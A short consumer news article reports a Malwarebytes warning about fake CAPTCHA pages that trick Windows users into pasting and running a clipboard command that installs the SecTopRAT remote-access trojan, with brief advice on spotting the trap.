Hackers are becoming more inventive when it comes to tricking Internet users into downloading and installing malware. Malwarebytes is currently warning about a rather unusual method... since it relies on a CAPTCHA screen – which is very common on the web. We'll explain how to spot it.
CAPTCHA screens are diversifying, and hackers are currently jumping at the chance to infect millions of PCs. These validation screens, very common on the internet, are used both to Avoid DDoS attacks and other abuses – while training machine learning models. Malwarebytes warns of a malicious campaign that hijacks the process to trap the user.
The CAPTCHA screen in question asks the user to perform a series of actions on Windows rather than finding images in a grid or dragging a puzzle piece to the right place. As soon as it appears, the screen copies a command to the clipboard. The instructions ask the user to press the Win + R keys, which opens a window to quickly launch a program or command.
Have you also fallen in this trap?
You can guess what happens next: the victim is urged to paste the contents of their clipboard and then press Enter. To lessen suspicion, all the user sees in the input field is a seemingly innocent message: “I'm not a robot — reCAPTCHA Verification ID: 8253”. In reality, the malicious command hides before this message. The command executes Mshta.exe, which allows code to be executed without setting off alarms. This then launches the download and execution of a Powershell script.
This script is responsible for the virus installation behind the scenes. In this case, it's SecTopRAT, a Trojan that allows hackers to take complete control of your PC remotely. It's fairly easy to spot this kind of trap if you too come across a corrupted CAPTCHA screen. What these screens ask you to do can vary. However, under no circumstances should you change anything on your machine or exit your browser.
0 Comments